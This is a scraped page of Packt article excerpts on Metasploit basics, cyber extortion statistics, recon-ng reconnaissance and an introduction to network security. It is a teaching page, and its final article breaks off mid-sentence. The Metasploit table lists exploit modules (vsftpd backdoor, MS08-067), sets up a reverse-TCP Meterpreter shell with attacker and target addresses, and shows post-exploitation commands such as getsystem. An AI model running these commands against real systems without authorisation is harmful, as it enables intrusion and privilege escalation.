knowledge about the commands and different modules. To start Metasploit, we first need to establish database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal: root@beast:~# service postgresql start Now, to initialize Metasploit's database let us initialize msfdb as shown in the following screenshot: It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start the Metasploit's database using the following command: root@beast:~# msfdb start We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to startMetasploit as shown in the following screenshot: Welcome to the Metasploit console, let us run the help command to see what other commands are available to us: The commands in the preceding screenshot are core Metasploit commands which are used to set/get variables, load plugins, route traffic, unset variables, printing version, finding the history of commands issued, and much more. These commands are pretty general. Let's see module based commands as follows: Everything related to a particular module in Metasploit comes under module controls section of the Help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core, and advanced options related to a module and even can edit a module inline. Let us learn some basic commands in Metasploit and familiarize ourselves to the syntax and semantics of these commands: Command Usage Example use [auxiliary/exploit/payload/encoder] To select a particular msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp show[exploits/payloads/encoder/auxiliary/options] To see the list of available modules of a particular type msf>show payloads msf> show options set [options/payload] To set a value to a particular object msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 setg [options/payload] To assign a value to a particular object globally, so the values do not change when a module is switched on msf>setgRHOST 192.168.10.112 run To launch an auxiliary module after all the required options are set msf>run exploit To launch an exploit msf>exploit back To unselect a module and move back msf(ms08_067_netapi)>back msf> Info To list the information related to a particular exploit/module/auxiliary msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info Search To find a particular module msf>search hfs check To check whether a particular target is vulnerable to the exploit or not msf>check Sessions To list the available sessions msf>sessions [session number]   Meterpreter commands Usage Example sysinfo To list system information of the compromised host meterpreter>sysinfo ifconfig To list the network interfaces on the compromised host meterpreter>ifconfig meterpreter>ipconfig (Windows) Arp List of IP and MAC addresses of hosts connected to the target meterpreter>arp background To send an active session to background meterpreter>background shell To drop a cmd shell on the target meterpreter>shell getuid To get the current user details meterpreter>getuid getsystem To escalate privileges and gain system access meterpreter>getsystem getpid To gain the process id of the meterpreter access meterpreter>getpid ps To list all the processes running at the target meterpreter>ps If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandsfor more information on basic commands Benefits of using Metasploit Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors which are listed as follows: Metasploit framework is open source Metasploit supports large testing networks by making use of CIDR identifiers Metasploit offers quick generation of payloads which can be changed or switched on the fly Metasploit leaves the target system stable in most of the cases The GUI environment provides a fast and user-friendly way to conduct penetration testing Summary Throughout this article, we learned the basics of Metasploit. We learned about various syntax and semantics of Metasploit commands. We also learned the benefits of using Metasploit. Resources for Article: Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]
Read more
  • 0
  • 0
  • 2704
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-introduction-cyber-extortion
Packt
19 Jun 2017
21 min read
Save for later

Introduction to Cyber Extortion

Packt
19 Jun 2017
21 min read
In this article by Dhanya Thakkar, the author of the book Preventing Digital Extortion, explains how often we make the mistake of relying on the past for predicting the future, and nowhere is this more relevant than in the sphere of the Internet and smart technology. People, processes, data, and things are tightly and increasingly connected, creating new, intelligent networks unlike anything else we have seen before. The growth is exponential and the consequences are far reaching for individuals, and progressively so for businesses. We are creating the Internet of Things and the Internet of Everything. (For more resources related to this topic, see here.) It has become unimaginable to run a business without using the Internet. It is not only an essential tool for current products and services, but an unfathomable well for innovation and fresh commercial breakthroughs. The transformative revolution is spillinginto the public sector, affecting companies like vanguards and diffusing to consumers, who are in a feedback loop with suppliers, constantly obtaining and demanding new goods. Advanced technologies that apply not only to machine-to-machine communication but also to smart sensors generate complex networks to which theoretically anything that can carry a sensor can be connected. Cloud computing and cloud-based applications provide immense yet affordable storage capacity for people and organizations and facilitate the spread of data in more ways than one. Keeping in mind the Internet’s nature, the physical boundaries of business become blurred, and virtual data protection must incorporate a new characteristic of security: encryption. In the middle of the storm of the IoT, major opportunities arise, and equally so, unprecedented risks lurk. People often think that what they put on the Internet is protected and closed information. It is hardly so. Sending an e-mail is not like sending a letter in a closed envelope. It is more like sending a postcard, where anyone who gets their hands on it can read what's written on it. Along with people who want to utilize the Internet as an open business platform, there are people who want to find ways of circumventing legal practices and misusing the wealth of data on computer networks by unlawfully gaining financial profits, assets, or authority that can be monetized. Being connected is now critical. As cyberspace is growing, so are attempts to violate vulnerable information gaining global scale. This newly discovered business dynamic is under persistent threat of criminals. Cyberspace, cyber crime, and cyber security are perceptibly being found in the same sentence. Cyber crime –under defined and under regulated A massive problem encouraging the perseverance and evolution of cyber crime is the lack of an adequate unanimous definition and the under regulation on a national, regional, and global level. Nothing is criminal unless stipulated by the law. Global law enforcement agencies, academia, and state policies have studied the constant development of the phenomenon since its first appearance in 1989, in the shape of the AIDS Trojan virus transferred from an infected floppy disk. Regardless of the bizarre beginnings, there is nothing entertaining about cybercrime. It is serious. It is dangerous. Significant efforts are made to define cybercrime on a conceptual level in academic research and in national and regional cybersecurity strategies. Still, as the nature of the phenomenon evolves, so must the definition. Research reports are still at a descriptive level, and underreporting is a major issue. On the other hand, businesses are more exposed due to ignorance of the fact that modern-day criminals increasingly rely on the Internet to enhance their criminal operations. Case in point: Aaushi Shah and Srinidhi Ravi from the Asian School of Cyber Laws have created a cybercrime list by compiling a set of 74 distinctive and creativelynamed actions emerging in the last three decades that can be interpreted as cybercrime. These actions target anything from e-mails to smartphones, personal computers, and business intranets: piggybacking, joe jobs, and easter eggs may sound like cartoons, but their true nature resembles a crime thriller. The concept of cybercrime Cyberspace is a giant community made out of connected computer users and data on a global level. As a concept, cybercrime involves any criminal act dealing withcomputers andnetworks, including traditional crimes in which the illegal activities are committed through the use of a computer and the Internet. As businesses become more open and widespread, the boundary between data freedom and restriction becomes more porous. Countless e-shopping transactions are made, hospitals keep record of patient histories, students pass exams, and around-the-clock payments are increasingly processed online. It is no wonder that criminals are relentlessly invading cyberspace trying to find a slipping crack. There are no recognizable border controls on the Internet, but a business that wants to evade harm needs to understand cybercrime's nature and apply means to restrict access to certain information. Instead of identifying it as a single phenomenon, Majid Jar proposes a common denominator approach for all ICT-related criminal activities. In his book Cybercrime and Society, Jar refers to Thomas and Loader’s working concept of cybercrime as follows: “Computer-mediated activities which are either illegal or considered illicit by certain parties and which can be conducted through global electronic network.” Jar elaborates the important distinction of this definition by emphasizing the difference between crime and deviance. Criminal activities are explicitly prohibited by formal regulations and bear sanctions, while deviances breach informal social norms. This is a key note to keep in mind. It encompasses the evolving definition of cybercrime, which keeps transforming after resourceful criminals who constantly think of new ways to gain illegal advantages. Law enforcement agencies on a global level make an essential distinction between two subcategories of cybercrime: Advanced cybercrime or high-tech crime Cyber-enabled crime The first subcategory, according to Interpol, includes newly emerged sophisticated attacks against computer hardware and software. On the other hand, the second category contains traditional crimes in modern clothes,for example crimes against children, such as exposing children to illegal content; financial crimes, such as payment card frauds, money laundering, and counterfeiting currency and security documents; social engineering frauds; and even terrorism. We are much beyond the limited impact of the 1989 cybercrime embryo. Intricate networks are created daily. They present new criminal opportunities, causing greater damage to businesses and individuals, and require a global response. Cybercrime is conceptualized as a service embracing a commercial component.Cybercriminals work as businessmen who look to sell a product or a service to the highest bidder. Critical attributes of cybercrime An abridged version of the cybercrime concept provides answers to three vital questions: Where are criminal activities committed and what technologies are used? What is the reason behind the violation? Who is the perpetrator of the activities? Where and how – realm Cybercrime can be an online, digitally committed, traditional offense. Even if the component of an online, digital, or virtual existence were not included in its nature, it would still have been considered crime in the traditional, real-world sense of the word. In this sense, as the nature of cybercrime advances, so mustthe spearheads of lawenforcement rely on laws written for the non-digital world to solve problems encountered online. Otherwise, the combat becomesstagnant and futile. Why – motivation The prefix "cyber" sometimes creates additional misperception when applied to the digital world. It is critical to differentiate cybercrime from other malevolent acts in the digital world by considering the reasoning behind the action. This is not only imperative for clarification purposes, but also for extending the definition of cybercrime over time to include previously indeterminate activities. Offenders commit a wide range of dishonest acts for selfish motives such as monetary gain, popularity, or gratification. When the intent behind the behavior is misinterpreted, confusion may arise and actions that should not have been classified as cybercrime could be charged with criminal prosecution. Who –the criminal deed component The action must be attributed to a perpetrator. Depending on the source, certain threats can be translated to the criminal domain only or expanded to endanger potential larger targets, representing an attack to national security or a terrorist attack. Undoubtedly, the concept of cybercrime needs additional refinement, and a comprehensive global definition is in progress. Along with global cybercrime initiatives, national regulators are continually working on implementing laws, policies, and strategies to exemplify cybercrime behaviors and thus strengthen combating efforts. Types of common cyber threats In their endeavors to raise cybercrime awareness, the United Kingdom'sNational Crime Agency (NCA) divided common and popular cybercrime activities by affiliating themwith the target under threat. While both individuals and organizations are targets of cyber criminals, it is the business-consumer networks that suffer irreparable damages due to the magnitude of harmful actions. Cybercrime targeting consumers Phishing The term encompasses behavior where illegitimate e-mails are sent to the receiver to collect security information and personal details Webcam manager A webcam manager is an instance of gross violating behavior in which criminals take over a person's webcam File hijacker Criminals hijack files and hold them "hostage" until the victim pays the demanded ransom Keylogging With keylogging, criminals have the means to record what the text behind the keysyou press on your keyboard is Screenshot manager A screenshot manager enables criminals to take screenshots of an individual’s computer screen Ad clicker Annoying but dangerous ad clickers direct victims’ computer to click on a specific harmful link Cybercrime targeting businesses Hacking Hacking is basically unauthorized access to computer data. Hackers inject specialist software with which they try to take administrative control of a computerized network or system. If the attack is successful, the stolen data can be sold on the dark web and compromise people’s integrity and safety by intruding and abusing the privacy of products as well as sensitive personal and business information. Hacking is particularly dangerous when it compromises the operation of systems that manage physical infrastructure, for example, public transportation. Distributed denial of service (DDoS) attacks When an online service is targeted by a DDoS attack, the communication links overflow with data from messages sent simultaneously by botnets. Botnets are a bunch of controlled computers that stop legitimate access to online services for users. The system is unable to provide normal access as it cannot handle the huge volume of incoming traffic. Cybercrime in relation to overall computer crime Many moons have passed since 2001, when the first international treatythat targeted Internet and computer crime—the Budapest Convention on Cybercrime—was adopted. The Convention’s intention was to harmonize national laws, improve investigative techniques, and increase cooperation among nations. It was drafted with the active participation of the Council of Europe's observer states Canada, Japan, South Africa, and the United States and drawn up by the Council of Europe in Strasbourg, France. Brazil and Russia, on the other hand, refused to sign the document on the basis of not being involved in the Convention's preparation. In The Understanding Cybercrime: A Guide to Developing Countries(Gercke, 2011), Marco Gercke makes an excellent final point: “Not all computer-related crimes come under the scope of cybercrime. Cybercrime is a narrower notion than all computer-related crime because it has to include a computer network. On the other hand, computer-related crime in general can also affect stand-alone computer systems.” Although progress has been made, consensus over the definition of cybercrime is not final. Keeping history in mind, a fluid and developing approach must be kept in mind when applying working and legal interpretations. In the end, international noncompliance must be overcome to establish a common and safe ground to tackle persistent threats. Cybercrime localized – what is the risk in your region? Europol’s heat map for the period between 2014 and 2015 reports on the geographical distribution of cybercrime on the basis of the United Nations geoscheme. The data in the report encompassed cyber-dependent crime and cyber-enabled fraud, but it did not include investigations into online child sexual abuse. North and South America Due to its overwhelming presence, it is not a great surprise that the North American region occupies several lead positions concerning cybercrime, both in terms of enabling malicious content and providing residency to victims in the regions that participate in the global cybercrime numbers. The United States hosted between 20% and nearly 40% of the total world's command-and-control servers during 2014. Additionally, the US currently hosts over 45% of the world's phishing domains and is in the pack of world-leading spam producers. Between 16% and 20% percent of all global bots are located in the United States, while almost a third of point-of-sale malware and over 40% of all ransomware incidents were detected there. Twenty EU member states have initiated criminal procedures in which the parties under suspicion were located in the United States. In addition, over 70 percent of the countries located in the Single European Payment Area have been subject to losses from skimmed payment cards because of the distinct way in which the US, under certain circumstances, processes card payments without chip-and-PIN technology. There are instances of cybercrime in South America, but the scope of participation by the southern continent is way smaller than that of its northern neighbor, both in industry reporting and in criminal investigations. Ecuador, Guatemala, Bolivia, Peru, and Brazil are constantly rated high on the malware infection scale, and the situation is not changing, while Argentina and Colombia remain among the top 10 spammer countries. Brazil has a critical role in point-of-sale malware, ATM malware, and skimming devices. Europe The key aspect making Europe a region with excellent cybercrime potential is the fast, modern, and reliable ICT infrastructure. According to The Internet Organised Crime Threat Assessment (IOCTA) 2015, Cybercriminals abuse Western European countries to host malicious content and launch attacks inside and outside the continent. EU countries host approximately 13 percent of the global malicious URLs, out of which Netherlands is the leading country, while Germany, the U.K., and Portugal come second, third, and fourth respectively. Germany, the U.K., the Netherlands, France, and Russia are important hosts for bot C&C infrastructure and phishing domains, while Italy, Germany, the Netherlands, Russia, and Spain are among the top sources of global spam. Scandinavian countries and Finland are famous for having the lowest malware infection rates. France, Germany, Italy, and to some extent the U.K. have the highest malware infection rates and the highest proportion of bots found within the EU. However, the findings are presumably the result of the high population of the aforementioned EU countries. A half of the EU member states identified criminal infrastructure or suspects in the Netherlands, Germany, Russia, or the United Kingdom. One third of the European law enforcement agencies confirmed connections to Austria, Belgium, Bulgaria, the Czech Republic, France, Hungary, Italy, Latvia, Poland, Romania, Spain, or Ukraine. Asia China is the United States' counterpart in Asia in terms of the top position concerning reported threats to Internet security. Fifty percent of the EU member states' investigations on cybercrime include offenders based in China. Moreover, certain authorities quote China as the source of one third of all global network attacks. In the company of India and South Korea, China is third among the top-10 countries hosting botnet C&C infrastructure, and it has one of the highest global malware infection rates. India, Indonesia, Malaysia, Taiwan, and Japan host serious bot numbers, too. Japan takes on a significant part both as a source country and as a victim of cybercrime. Apart from being an abundant spam source, Japan is included in the top three Asian countries where EU law enforcement agencies have identified cybercriminals. On the other hand, Japan, along with South Korea and the Philippines, is the most popular country in the East and Southeast region of Asia where organized crime groups run sextortion campaigns. Vietnam, India, and China are the top Asian countries featuring spamming sources. Alternatively, China and Hong Kong are the most prominent locations for hosting phishing domains. From another point of view, the country code top-level domains (ccTLDs) for Thailand and Pakistan are commonly used in phishing attacks. In this region, most SEPA members reported losses from the use of skimmed cards. In fact, five (Indonesia, Philippines, South Korea, Vietnam, and Malaysia) out of the top six countries are from this region. Africa Africa remains renowned for combined and sophisticated cybercrime practices. Data from the Europol heat map report indicates that the African region holds a ransomware-as-a-service presence equivalent to the one of the European black market. Cybercriminals from Africa make profits from the same products. Nigeria is on the list of the top 10 countries compiled by the EU law enforcement agents featuring identified cybercrime perpetrators and related infrastructure. In addition, four out of the top five top-level domains used for phishing are of African origin: .cf, .za, .ga, and .ml. Australia and Oceania Australia has two critical cybercrime claims on a global level: First, the country is present in several top-10 charts in the cybersecurity industry, including bot populations, ransomware detection, and network attack originators. Second, the country-code top-level domain for the Palau Islands in Micronesia is massively used by Chinese attackers as the TLD with the second highest proportion of domains used for phishing. Cybercrime in numbers Experts agree that the past couple of years have seen digital extortion flourishing. In 2015 and 2016, cybercrime reached epic proportions. Although there is agreement about the serious rise of the threat, putting each ransomware aspect into numbers is a complex issue. Underreporting is not an issue only in academic research but also in practical case scenarios. The threat to businesses around the world is growing, because businesses keep it quiet. The scope of extortion is obscured because companies avoid reporting and pay the ransom in order to settle the issue in a conducive way. As far as this goes for corporations, it is even more relevant for public enterprises or organizations that provide a public service of any kind. Government bodies, hospitals, transportation companies, and educational institutions are increasingly targeted with digital extortion. Cybercriminals estimate that these targets are likely to pay in order to protect drops in reputation and to enable uninterrupted execution of public services. When CEOs and CIOs keep their mouths shut, relying on reported cybercrime numbers can be a tricky question. The real picture is not only what is visible in the media or via professional networking, but also what remains hidden and is dealt with discreetly by the security experts. In the second quarter of 2015, Intel Security reported an increase in ransomware attacks by 58%. Just in the first 3 months of 2016, cybercriminals amassed $209 million from digital extortion. By making businesses and authorities pay the relatively small average ransom amount of $10,000 per incident, extortionists turn out to make smart business moves. Companies are not shaken to the core by this amount. Furthermore, they choose to pay and get back to business as usual, thus eliminating further financial damages that may arise due to being out of business and losing customers. Extortionists understand the nature of ransom payment and what it means for businesses and institutions. As sound entrepreneurs, they know their market. Instead of setting unreasonable skyrocketing prices that may cause major panic and draw severe law enforcement action, they keep it low profile. In this way, they maintain the dark business in flow, moving from one victim to the next and evading legal measures. A peculiar perspective – Cybercrime in absolute and normalized numbers “To get an accurate picture of the security of cyberspace, cybercrime statistics need to be expressed as a proportion of the growing size of the Internet similar to the routine practice of expressing crime as a proportion of a population, i.e., 15 murders per 1,000 people per year.” This statement by Eric Jardine from the Global Commission on Internet Governance (Jardine, 2015) launched a new perspective of cybercrime statistics, one that accounts for the changing nature and size of cyberspace. The approach assumes that viewing cybercrime findings isolated from the rest of the changes in cyberspace provides a distorted view of reality. The report aimed at normalizing crime statistics and thus avoiding negative, realistic cybercrime scenarios that emerge when drawing conclusions from the limited reliability of absolute numbers. In general, there are three ways in which absolute numbers can be misinterpreted: Absolute numbers can negatively distort the real picture, while normalized numbers show whether the situation is getting better Both numbers can show that things are getting better, but normalized numbers will show that the situation is improving more quickly Both numbers can indicate that things are deteriorating, but normalized numbers will indicate that the situation is deteriorating at a slower rate than absolute numbers Additionally, the GCIG (Global Commission on Internet Governance) report includes some excellent reasoning about the nature of empirical research undertaken in the age of the Internet. While almost everyone and anything is connected to the network and data can be easily collected, most of the information is fragmented across numerous private parties. Normally, this entangles the clarity of the findings of cybercrime presence in the digital world. When data is borrowed from multiple resources and missing slots are modified with hypothetical numbers, the end result can be skewed. Keeping in mind this observation, it is crucial to emphasize that the GCIG report measured the size of cyberspace by accounting for eight key aspects: The number of active mobile broadband subscriptions The number of smartphones sold to end users The number of domains and websites The volume of total data flow The volume of mobile data flow The annual number of Google searches The Internet’s contribution to GDP It has been illustrated several times during this introduction that as cyberspace grows, so does cybercrime. To fight the menace, businesses and individuals enhance security measures and put more money into their security budgets. A recent CIGI-Ipsos (Centre for International Governance Innovation - Ipsos) survey collected data from 23,376 Internet users in 24 countries, including Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey, and the United States. Survey results showed that 64% of users were more concerned about their online privacy compared to the previous year, whereas 78% were concerned about having their banking credentials hacked. Additionally, 77% of users were worried about cyber criminals stealing private images and messages. These perceptions led to behavioral changes: 43% of users started avoiding certain sites and applications, some 39% regularly updated passwords, while about 10% used the Internet less (CIGI-Ipsos, 2014). GCIC report results are indicative of a heterogeneous cyber security picture. Although many cybersecurity aspects are deteriorating over time, there are some that are staying constant, and a surprising number are actually improving. Jardine compares cyberspace security to trends in crime rates in a specific country operationalizing cyber attacks via 13 measures presented in the following table, as seen in Table 2 of Summary Statistics for the Security of Cyberspace(E. Jardine, GCIC Report, p. 6):    Minimum Maximum Mean Standard Deviation New Vulnerabilities 4,814 6,787 5,749 781.880 Malicious Web Domains 29,927 74,000 53,317 13,769.99 Zero-day Vulnerabilities 8 24 14.85714 6.336 New Browser Vulnerabilities 232 891 513 240.570 Mobile Vulnerabilities 115 416 217.35 120.85 Botnets 1,900,000 9,437,536 4,485,843 2,724,254 Web-based Attacks 23,680,646 1,432,660,467 907,597,833 702,817,362 Average per Capita Cost 188 214 202.5 8.893818078 Organizational Cost 5,403,644 7,240,000 6,233,941 753,057 Detection and Escalation Costs 264,280 455,304 372,272 83,331 Response Costs 1,294,702 1,738,761 1,511,804 152,502.2526 Lost Business Costs 3,010,000 4,592,214 3,827,732 782,084 Victim Notification Costs 497,758 565,020 565,020 30,342   While reading the table results, an essential argument must be kept in mind. Statistics for cybercrime costs are not available worldwide. The author worked with the assumption that data about US costs of cybercrime indicate costs on a global level. For obvious reasons, however, this assumption may not be true, and many countries will have had significantly lower costs than the US. To mitigate the assumption's flaws, the author provides comparative levels of those measures. The organizational cost of data breaches in 2013 in the United States was a little less than six million US dollars, while the average number on the global level, which was drawn from the Ponemon Institute’s annual Cost of Data Breach Study (from 2011, 2013, and 2014 via Jardine, p.7) measured the overall cost of data breaches, including the US ones, as US$2,282,095. The conclusion is that US numbers will distort global cost findings by expanding the real costs and will work against the paper's suggestion, which is that normalized numbers paint a rosier picture than the one provided by absolute numbers. Summary In this article, we have covered the birth and concept of cyber crime and the challenges law enforcement, academia, and security professionals face when combating its threatening behavior. We also explored the impact of cyber crime by numbers on varied geographical regions, industries, and devices. Resources for Article:  Further resources on this subject: Interactive Crime Map Using Flask [article] Web Scraping with Python [article]
Read more
  • 0
  • 0
  • 1946

article-image-web-application-information-gathering
Packt
05 Jun 2017
4 min read
Save for later

Web Application Information Gathering

Packt
05 Jun 2017
4 min read
In this article by Ishan Girdhar, author of the book, Kali Linux Intrusion and Exploitation Cookbook, we will cover the following recipes: Setup API keys for the recon-ng framework Use recon-ng for reconnaissance (For more resources related to this topic, see here.) Setting up API keys for recon-ng framework In this recipe, we will see how we need to set up API keys before we start using recon-ng. Recon-ng is one of the most powerful information gathering tools, if used appropriately, it can help pentesters locating good amount of information from public sources. With the latest version available, recon-ng provides the flexibility to set it up as your own app/client in various social networking websites. Getting ready For this recipe, you require an Internet connection and web browser. How to do it... To set up recon-ng API keys, open the terminal and launch recon-ng and type the commands shown in the following screenshot: Next, type keys list as shown in the following screenshot: Let's start by adding twitter_API & twitter_secret. Log in to Twitter, go to https://apps.twitter.com/, and create a new application as shown in the following screenshot: Click on Create Application once the application is created, navigate to Keys & Access tokens tabs, and copy the secret key and API key as shown in the following screenshot: Copy the API key and reopen the terminal window again run the following command to add the key: Keys add twitter_api <your-copied-api-key> Now, enter the following command to enter the twitter_secret name in recon-ng: keys add twitter_secret <you_twitter_secret> Once you added the keys, you can see the keys added in the recon-ng tool by entering the following command: keys list How it works... In this recipe, you learned how to add API keys to the recon-ng tool. To demonstrate the same, we have created a Twitter application and used Twitter_API and Twitter_Secret and added them to the recon-ng tool. The result is as shown in the following screenshot: Similarly, you will need to include all the API keys here in the recon-ng if you want to gather information from these sources. In next recipe, you will learn how to use recon-ng for information gathering. Use recon-ng for reconnaissance In this recipe, you will learn to use recon-ng for reconnaissance. Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly. Getting ready To install Kali Linux, you will require an Internet connection. How to do it... Open a terminal and start the recon-ng framework, as shown in the following screenshot: Recon-ng has the look and feel like that of Metasploit. To see all the available modules, enter the following command: show modules Recon-ng will list all available modules, as shown in the following screenshot: Let's go ahead and use our first module for information gathering. Enter the following command: use recon/domains-vulnerabilities/punkspider Now, enter the commands shown in the following screenshot: As you can see, there are some vulnerabilities discovered and are available publically. Let's use another module that fetches any known and reported vulnerabilities from xssed.com. The XSSed project was created in early February 2007 by KF and DP. It provides information on all things related to cross-site scripting vulnerabilities and is the largest online archive of XSS vulnerable websites. It's a good repository of XSS to gather information. To begin with, enter the following command: Show module use recon/domains-vulnerabilities/xssed Show Options Set source Microsoft.com Show Options RUN You will see the following output: As you can see, recon-ng has aggregated the publically available vulnerabilities from XSSed, as shown in the following screenshot: Similarly, you can keep using the different modules until and unless you get your required information regarding your target. Summary In this article, you learned how to add API keys to the recon-ng tool. To demonstrate the same, we have created a Twitter application and used Twitter_API and Twitter_Secret and added them to the recon-ng tool. You also learned how to use recon-ng for reconnaissance. Resources for Article: Further resources on this subject: Getting Started with Metasploitable2 and Kali Linux [article] Wireless Attacks in Kali Linux [article] What is Kali Linux [article]
Read more
  • 0
  • 0
  • 4309

article-image-introduction-network-security
Packt
06 Apr 2017
18 min read
Save for later

Introduction to Network Security

Packt
06 Apr 2017
18 min read
In this article by Warun Levesque, Michael McLafferty, and Arthur Salmon, the authors of the book Applied Network Security, we will be covering the following topics, which will give an introduction to network security: Murphy's law The definition of a hacker and the types The hacking process Recent events and statistics of network attacks Security for individual versus company Mitigation against threats Building an assessment This world is changing rapidly with advancing network technologies. Unfortunately, sometimes the convenience of technology can outpace its security and safety. Technologies like the Internet of things is ushering in a new era of network communication. We also want to change the mindset of being in the field of network security. Most current cyber security professionals practice defensive and passive security. They mostly focus on mitigation and forensic tactics to analyze the aftermath of an attack. We want to change this mindset to one of Offensive security. This article will give insight on how a hacker thinks and what methods they use. Having knowledge of a hacker's tactics, will give the reader a great advantage in protecting any network from attack. (For more resources related to this topic, see here.) Murphy's law Network security is much like Murphy's law in the sense that, if something can go wrong it will go wrong. To be successful at understanding and applying network security, a person must master the three Ps. The three Ps are, persistence, patience, and passion. A cyber security professional must be persistent in their pursuit of a solution to a problem. Giving up is not an option. The answer will be there; it just may take more time than expected to find it. Having patience is also an important trait to master. When dealing with network anomalies, it is very easy to get frustrated. Taking a deep breath and keeping a cool head goes a long way in finding the correct solution to your network security problems. Finally, developing a passion for cyber security is critical to being a successful network security professional. Having that passion will drive you to learn more and evolve yourself on a daily basis to be better. Once you learn, then you will improve and perhaps go on to inspire others to reach similar aspirations in cyber security. The definition of a hacker and the types A hacker is a person who uses computers to gain unauthorized access to data. There are many different types of hackers. There are white hat, grey hat, and black hat hackers. Some hackers are defined for their intention. For example, a hacker that attacks for political reasons may be known as a hacktivist. A white hat hackers have no criminal intent, but instead focuses on finding and fixing network vulnerabilities. Often companies will hire a white hat hacker to test the security of their network for vulnerabilities. A grey hat hacker is someone who may have criminal intent but not often for personal gain. Often a grey hat will seek to expose a network vulnerability without the permission from the owner of the network. A black hat hacker is purely criminal. They sole objective is personal gain. Black hat hackers take advantage of network vulnerabilities anyway they can for maximum benefit. A cyber-criminal is another type of black hat hacker, who is motivated to attack for illegal financial gain. A more basic type of hacker is known as a script kiddie. A script kiddie is a person who knows how to use basic hacking tools but doesn't understand how they work. They often lack the knowledge to launch any kind of real attack, but can still cause problems on a poorly protected network. Hackers tools There are a range of many different hacking tools. A tool like Nmap for example, is a great tool for both reconnaissance and scanning for network vulnerabilities. Some tools are grouped together to make toolkits and frameworks, such as the Social Engineering Toolkit and Metasploit framework. The Metasploit framework is one of the most versatile and supported hacking tool frameworks available. Metasploit is built around a collection of highly effective modules, such as MSFvenom and provides access to an extensive database of exploits and vulnerabilities. There are also physical hacking tools. Devices like the Rubber Ducky and Wi-Fi Pineapple are good examples. The Rubber Ducky is a usb payload injector, that automatically injects a malicious virus into the device it's plugged into. The Wi-Fi Pineapple can act as a rogue router and be used to launch man in the middle attacks. The Wi-Fi Pineapple also has a range of modules that allow it to execute multiple attack vectors. These types of tools are known as penetration testing equipment. The hacking process There are five main phases to the hacking process: Reconnaissance: The reconnaissance phase is often the most time consuming. This phase can last days, weeks, or even months sometimes depending on the target. The objective during the reconnaissance phase is to learn as much as possible about the potential target. Scanning: In this phase the hacker will scan for vulnerabilities in the network to exploit. These scans will look for weaknesses such as, open ports, open services, outdated applications (including operating systems), and the type of equipment being used on the network. Access: In this phase the hacker will use the knowledge gained in the previous phases to gain access to sensitive data or use the network to attack other targets. The objective of this phase is to have the attacker gain some level of control over other devices on the network. Maintaining access: During this phase a hacker will look at various options, such as creating a backdoor to maintain access to devices they have compromised. By creating a backdoor, a hacker can maintain a persistent attack on a network, without fear of losing access to the devices they have gained control over. Although when a backdoor is created, it increases the chance of a hacker being discovered. Backdoors are noisy and often leave a large footprint for IDS to follow. Covering your tracks: This phase is about hiding the intrusion of the network by the hacker as to not alert any IDS that may be monitoring the network. The objective of this phase is to erase any trace that an attack occurred on the network. Recent events and statistics of network attacks The news has been full of cyber-attacks in recent years. The number and scale of attacks are increasing at an alarming rate. It is important for anyone in network security to study these attacks. Staying current with this kind of information will help in defending your network from similar attacks. Since 2015, the medical and insurance industry have been heavily targeted for cyber-attacks. On May 5th, 2015 Premera Blue Cross was attacked. This attack is said to have compromised at least 11 million customer accounts containing personal data. The attack exposed customer's names, birth dates, social security numbers, phone numbers, bank account information, mailing, and e-mail addresses. Another attack that was on a larger scale, was the attack on Anthem. It is estimated that 80 million personal data records were stolen from customers, employees, and even the Chief Executive Officer of Anthem. Another more infamous cyber-attack recently was the Sony hack. This hack was a little different than the Anthem and Blue Cross attacks, because it was carried out by hacktivist instead of cyber-criminals. Even though both types of hacking are criminal, the fundamental reasoning and objectives of the attacks are quite different. The objective in the Sony attack was to disrupt and embarrass the executives at Sony as well as prevent a film from being released. No financial data was targeted. Instead the hackers went after personal e-mails of top executives. The hackers then released the e-mails to the public, causing humiliation to Sony and its executives. Many apologies were issued by Sony in the following weeks of the attack. Large commercial retailers have also been a favorite target for hackers. An attack occurred against Home Depot in September 2014. That attack was on a large scale. It is estimated that over 56 million credit cards were compromised during the Home Depot attack. A similar attack but on a smaller scale was carried out against Staples in October 2014. During this attack, over 1.4 million credit card numbers were stolen. The statistics on cyber security attacks are eye opening. It is estimated by some experts that cybercrime has a worldwide cost of 110 billion dollars a year. In a given year, over 15 million Americans will have their identified stolen through cyber-attacks, it is also estimated that 1.5 million people fall victim to cybercrime every day. These statistics are rapidly increasing and will continue to do so until more people take an active interest in network security. Our defense The baseline for preventing a potential security issues typically begins with hardening the security infrastructure, including firewalls, DMZ, and physical security platform. Entrusting only valid sources or individuals with personal data and or access to that data. That also includes being compliant with all regulations that apply to a given situation or business. Being aware of the types of breaches as well as your potential vulnerabilities. Also understanding is an individual or an organization a higher risk target for attacks. The question has to be asked, does one's organization promote security? This is done both at the personal and the business level to deter cyber-attacks? After a decade of responding to incidents and helping customers recover from and increase their resilience against breaches. Organization may already have a security training and awareness (STA) program, or other training and program could have existed. As the security and threat landscape evolves organizations and individuals need to continually evaluate practices that are required and appropriate for the data they collect, transmit, retain, and destroy. Encryption of data at rest/in storage and in transit is a fundamental security requirement and the respective failure is frequently being cited as the cause for regulatory action and lawsuits. Enforce effective 